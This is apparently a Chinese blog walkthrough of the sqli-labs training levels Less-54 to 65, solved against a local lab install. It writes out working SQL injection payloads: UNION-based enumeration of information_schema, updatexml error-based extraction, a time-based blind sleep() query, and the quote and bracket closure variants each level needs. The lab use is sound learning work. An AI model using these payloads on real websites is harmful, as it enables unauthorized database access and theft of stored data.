Sqli-labs实验Task4(less54-65)

Sqli-labs实验Task4(less54-65)

Less-54

Page 4又是不一样的挑战:


1.PNG

可以看到这一串英文的提示是告诉我们需要在不到10次尝试中从数据库challenges中的随机表中获取秘钥,有趣的是,每次都会重置,challenge都会产生随机的表名、列名、表数据。一直保持新鲜。
分析分析可以知道,这个和ctf差不多,我们需要获取flag来提交才算成功。
首先第一次判断闭合情况,一次成功,单引号闭合:

$ 127.0.0.1/sqli-labs-master/Less-54/?id=1’

知道数据库名是challenges,下面获取表名:

$ 127.0.0.1/sqli-labs-master/Less-54/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' -- #
2.PNG

获取了表名,果然是随机产生的,现在获取字段:

$ 127.0.0.1/sqli-labs-master/Less-54/?id=0' union select 1,2,column_name from information_schema.columns where table_name='8al0pvg8mg' and table_schema='challenges' -- #
3.PNG

可以看到第一个字段是id,还是直接获取所有列名把,有点蠢,以为一次就能出:

$ 127.0.0.1/sqli-labs-master/Less-54/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='8al0pvg8mg' and table_schema='challenges' -- #
4.PNG

根据观察列名应该就是第三个secet_IKU1后面几位应该就是随机产生的,哈哈现在获取flag了:

$ 127.0.0.1/sqli-labs-master/Less-54/?id=0' union select id,sessid,secret_IKU1 from challenges.8al0pvg8mg -- #
5.PNG

哈哈哈,后面直接提交就可以了啦!透个底,作者第一次成功的次数是8次,这个是第二次写博客的时候重新测试的。

Less-55

这一个和上一个差不多,不过将次数增加到了14次,可见难度肯定又有上升了!先来看看闭合情况:

$ 127.0.0.1/sqli-labs-master/Less-55/?id=1) -- #

没有报错,很难受,就一个括号的闭合,我竟然猜了6次!!!!!太浪费了,太浪费了。后面就差不多了。54的payload可以直接用,更改一下闭合就行了。最后9次才出来,有点丢人。

Less-56

同样是14次,按照之前的套路,这个时候应该是一个有报错的双重闭合。

$ 127.0.0.1/sqli-labs-master/Less-56/?id=1') -- #

单引号加括号,没意思,大家可以自己玩玩。

Less-57

我猜应该也是不同的闭合,每次套餐四个不是吗?

$ 127.0.0.1/sqli-labs-master/Less-57/?id=1" -- #

Less-58

这一次就给力了,只有5次机会,这就基本要保证我们每一次都不能出现错误。
测试了一下还是单引号闭合:

$ 127.0.0.1/sqli-labs-master/Less-58/?id=1' -- #

试一下54的payload发现不行!这样不行,那就得换方法了,发现可以报错,试试我们之前的updatexml的报错看看:

$ 127.0.0.1/sqli-labs-master/Less-58/?id=1' and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1))-- #
6.PNG

成功,但是次数不够了,尴尬,只能重开一局了。
后面的话就直接修改updatexml里面的第二个参数的查询语句就可以啦,我就不废话了。

Less-59

这个比上面那个还简单,没有闭合。根据报错可以看出:

$ 127.0.0.1/sqli-labs-master/Less-59/?id=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1))-- #

Less-60

和上面一样,闭合情况改为了双引号加括号:

$ 127.0.0.1/sqli-labs-master/Less-60/?id=1") -- #

Less-61

哇,这一次,我没有试出来,看了源码才弄出来闭合。。。。头皮发麻,单引号加两重括号,这第一次见:

$ 127.0.0.1/sqli-labs-master/Less-61/?id=1')) -- #

其他的就和之前的一样。

Less-62

我的天,这一次让我们130次的机会,我猜现在肯定就只能利用布尔的盲注,不然照实验这么抠的,怎么会给130次机会。。
可以看到,现在没有报错,只能自己猜闭合情况,然后union联合查询也没用,只能利用布尔盲注。
闭合是单引号加括号。
尝试获取信息:

$ 127.0.0.1/sqli-labs-master/Less-62/?id=1') and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10)) -- #

这个时候肯定就只能利用脚本了。大家可以用sqlmap试试,我这里就没弄了。

Less-63

这个和62一样,不过闭合变成了单引号。

Less-64

这个也一样,闭合变成了双重括号!!!

Less-65

双引号加括号!

结束语

本来看sqli-lab的分布图应该是有到less-75的,但是一直也没有找到,就暂且不论了。还有这次的sqli-lab的实验过程中,基本都是手动做的,因此很多需要布尔,时间的盲注的less都没有好好弄,之后有时间会整理出一套用工具的教程来完善一下。
就像我的学长曾经指导我一样,他没有具体去教我如何学习渗透,学习注入的知识,他很鄙视渗透,甚至都不愿教我们,但他又承认,这是安全工作者必备的技能。
安全学习过程中,路漫漫其修远兮!

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,456评论 5 477
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,370评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,337评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,583评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,596评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,572评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,936评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,595评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,850评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,601评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,685评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,371评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,951评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,934评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,167评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 43,636评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,411评论 2 342

推荐阅读更多精彩内容